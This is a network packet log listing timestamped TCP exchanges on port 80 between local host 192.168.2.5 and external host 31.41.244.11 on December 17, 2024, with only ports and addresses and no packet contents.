Dec 17, 2024 06:03:31.777049065 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.777287960 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.911719084 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.911813974 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.911864042 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.911966085 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.912185907 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.912343025 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.912350893 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.912404060 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.913311005 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.913388014 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.913422108 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.913631916 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.914437056 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.914578915 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.914594889 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.914736986 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.915509939 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.915590048 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.915622950 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.915839911 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.916611910 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.916692019 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.916779041 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.916779041 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.917700052 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.917802095 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.917809010 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.917907000 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.918778896 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.918883085 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.918909073 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.919056892 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.919919968 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.920042992 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.920059919 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.920203924 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.920984983 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.921101093 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.921119928 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.921163082 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.922095060 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.922194004 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.922204018 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.922252893 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.923181057 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.923289061 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.923302889 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.923382044 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.924276114 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.924386978 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.924446106 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.925386906 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.925451040 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.925499916 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.925600052 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.926472902 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.926554918 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.926589012 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.926665068 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.927580118 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.927633047 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.927676916 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.927740097 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.928644896 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.928714037 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.928792000 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.928915024 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.929759979 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.929837942 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.929893017 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.929943085 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.930860043 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.930979967 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.930982113 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.931061029 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.931982994 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.932085037 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.932125092 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.932284117 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.933083057 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.933197021 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.933214903 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.933499098 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.934170008 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.934269905 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.934292078 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.934341908 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.935266018 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.935352087 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.935405016 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.935472012 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.936389923 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.936470032 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.936503887 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.936570883 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.937478065 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.937545061 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.937587976 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.937639952 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.938575983 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.938687086 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.938823938 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.939683914 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.939812899 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.939857960 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.940036058 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.940764904 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.940891027 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.941025972 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.941025972 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.941907883 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.942012072 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.942085028 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.942972898 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.943105936 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.943157911 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.944041014 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.944097996 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.944164991 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.944291115 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.944292068 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.945169926 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.945270061 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.945288897 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.945494890 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.946249962 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.946367979 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.946412086 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.946412086 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.947371006 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.947515011 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.947525024 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.947634935 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.948482037 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.948582888 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.948658943 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.948658943 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.949554920 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.949675083 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.949765921 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.949765921 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.950675011 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.950798988 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.950932980 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.951783895 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.951886892 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.951896906 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.951961040 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.952871084 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.952965021 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.953016043 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.953047037 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.954036951 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.954154015 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.954157114 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.954384089 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.955066919 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.955168009 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.955171108 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.955271959 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.956178904 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.956214905 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.956258059 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.956352949 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.957245111 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.957350969 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.957353115 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.957510948 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.958331108 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.958396912 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.958446980 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.958568096 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.959482908 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.959585905 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.959630966 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.960171938 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.960541010 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.960637093 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.960690022 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.960880995 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.961625099 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.961720943 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.961762905 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.961832047 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.962729931 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.962788105 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.962855101 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.962922096 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.963850021 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.963937044 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.963941097 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.964031935 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.964947939 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.965049028 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.965146065 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.966033936 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.966120958 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.966375113 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.966375113 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.967116117 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.967221975 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.967340946 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.967462063 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.968302965 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.968385935 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.968431950 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.968503952 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.969300985 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.969388962 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.103688955 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.103756905 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.103849888 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.103918076 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.104051113 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.104083061 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.104104042 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.105000973 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.105113983 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.105153084 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.105178118 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.106106043 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.106168985 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.106223106 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.106297016 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.107215881 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.107294083 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.107346058 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.107435942 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.108334064 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.108427048 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.108525991 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.108525991 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.109416962 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.109509945 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.110133886 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.110133886 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.110491037 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.110578060 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.110673904 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.111037016 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.111660004 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.111715078 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.111721992 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.111771107 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.112690926 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.112780094 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.112816095 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.112868071 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.113807917 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.113912106 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.114093065 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.114093065 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.114871025 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.114984989 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.115118980 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.115118980 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.116009951 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.116106033 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.116107941 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.116228104 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.117069960 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.117187977 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.117192030 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.117346048 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.118202925 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.118298054 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.118304968 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.118362904 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.119299889 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.119359016 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.119389057 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.119436979 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.120415926 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.120481014 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.120486021 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.120580912 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.121463060 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.121546984 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.121602058 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.121653080 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.122562885 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.122647047 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.122759104 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.123691082 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.123816967 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.123828888 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.123888016 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.124759912 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.124842882 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.124855042 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.124902964 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.125861883 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.125962973 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.125972033 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.126044035 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.126945019 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.127053976 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.127151012 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.128051996 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.128134012 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.128180027 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.128269911 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.129144907 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.129209042 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.129251003 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.129368067 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.130248070 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.130359888 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.130403042 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.130403042 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.131345987 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.131510019 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.131560087 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.132462025 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.132570982 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.132616997 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.133569002 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.133613110 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.133672953 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.133744955 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.134649992 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.134727955 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.134732008 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.134882927 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.135763884 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.135864019 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.135874987 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.136137009 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.136851072 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.136971951 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.137386084 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.137386084 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.137931108 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.138006926 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.138009071 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.138124943 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.139046907 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.139172077 CET	80	49882	31.41.244.11	192.168.2.5
